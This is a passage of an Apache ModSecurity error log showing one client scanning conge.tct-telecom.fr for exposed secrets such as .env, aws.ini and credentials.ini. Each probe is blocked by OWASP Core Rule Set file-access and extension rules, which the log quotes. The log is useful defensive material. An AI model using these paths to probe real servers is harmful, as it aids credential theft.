"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/config/aws.ini"] [unique_id "agImN5Yn-x0CHsbEbP2tWAAAAIQ"]
[Mon May 11 20:55:51.984590 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/aws.ini"] [unique_id "agImN5Yn-x0CHsbEbP2tWAAAAIQ"]
[Mon May 11 20:55:51.984773 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/aws.ini"] [unique_id "agImN5Yn-x0CHsbEbP2tWAAAAIQ"]
[Mon May 11 20:55:52.067605 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/parameters.yml"] [unique_id "agImOJYn-x0CHsbEbP2tWwAAAIQ"]
[Mon May 11 20:55:52.067757 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/parameters.yml"] [unique_id "agImOJYn-x0CHsbEbP2tWwAAAIQ"]
[Mon May 11 20:55:52.067931 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/parameters.yml"] [unique_id "agImOJYn-x0CHsbEbP2tWwAAAIQ"]
[Mon May 11 20:55:52.121890 2026] [proxy_fcgi:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:52.369333 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/configs/application.ini"] [unique_id "agImOCMeXtzav-mi9SyxXAAAAM8"]
[Mon May 11 20:55:52.369654 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/configs/application.ini"] [unique_id "agImOCMeXtzav-mi9SyxXAAAAM8"]
[Mon May 11 20:55:52.369895 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/configs/application.ini"] [unique_id "agImOCMeXtzav-mi9SyxXAAAAM8"]
[Mon May 11 20:55:52.396598 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/constants.ini"] [unique_id "agImODP5Q_-MBliRCAxnEQAAABM"]
[Mon May 11 20:55:52.396884 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/constants.ini"] [unique_id "agImODP5Q_-MBliRCAxnEQAAABM"]
[Mon May 11 20:55:52.397080 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/constants.ini"] [unique_id "agImODP5Q_-MBliRCAxnEQAAABM"]
[Mon May 11 20:55:52.552475 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agImOCMeXtzav-mi9SyxXgAAAM8"]
[Mon May 11 20:55:52.552671 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agImOCMeXtzav-mi9SyxXgAAAM8"]
[Mon May 11 20:55:52.552869 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agImOCMeXtzav-mi9SyxXgAAAM8"]
[Mon May 11 20:55:52.626571 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/credentials.ini"] [unique_id "agImOCMeXtzav-mi9SyxYAAAANA"]
[Mon May 11 20:55:52.626834 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/credentials.ini"] [unique_id "agImOCMeXtzav-mi9SyxYAAAANA"]
[Mon May 11 20:55:52.627035 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/credentials.ini"] [unique_id "agImOCMeXtzav-mi9SyxYAAAANA"]
[Mon May 11 20:55:52.650444 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agImOCMeXtzav-mi9SyxYQAAANA"]
[Mon May 11 20:55:52.650593 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agImOCMeXtzav-mi9SyxYQAAANA"]
[Mon May 11 20:55:52.650766 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agImOCMeXtzav-mi9SyxYQAAANA"]
[Mon May 11 20:55:52.673119 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/develop/.env"] [unique_id "agImOCMeXtzav-mi9SyxYwAAANA"]
[Mon May 11 20:55:52.673276 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/develop/.env"] [unique_id "agImOCMeXtzav-mi9SyxYwAAANA"]
[Mon May 11 20:55:52.673451 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/develop/.env"] [unique_id "agImOCMeXtzav-mi9SyxYwAAANA"]
[Mon May 11 20:55:52.686034 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /developer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/developer/.env"] [unique_id "agImOFNddpkriGUb6ZV2hwAAARE"]
[Mon May 11 20:55:52.686211 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/developer/.env"] [unique_id "agImOFNddpkriGUb6ZV2hwAAARE"]
[Mon May 11 20:55:52.686396 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/developer/.env"] [unique_id "agImOFNddpkriGUb6ZV2hwAAARE"]
[Mon May 11 20:55:52.694400 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agImODP5Q_-MBliRCAxnFgAAAAo"]
[Mon May 11 20:55:52.694610 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agImODP5Q_-MBliRCAxnFgAAAAo"]
[Mon May 11 20:55:52.694815 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agImODP5Q_-MBliRCAxnFgAAAAo"]
[Mon May 11 20:55:52.704750 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agImOJYn-x0CHsbEbP2tZAAAAI8"]
[Mon May 11 20:55:52.704924 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agImOJYn-x0CHsbEbP2tZAAAAI8"]
[Mon May 11 20:55:52.705119 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agImOJYn-x0CHsbEbP2tZAAAAI8"]
[Mon May 11 20:55:52.707638 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agImOPjVc-A-CSptvm1xOQAAAEg"]
[Mon May 11 20:55:52.707815 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agImOPjVc-A-CSptvm1xOQAAAEg"]
[Mon May 11 20:55:52.708001 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agImOPjVc-A-CSptvm1xOQAAAEg"]
[Mon May 11 20:55:52.727669 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/demo/.env"] [unique_id "agImONeaRXe5lR8y0ZOSugAAAUI"]
[Mon May 11 20:55:52.727828 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/demo/.env"] [unique_id "agImONeaRXe5lR8y0ZOSugAAAUI"]
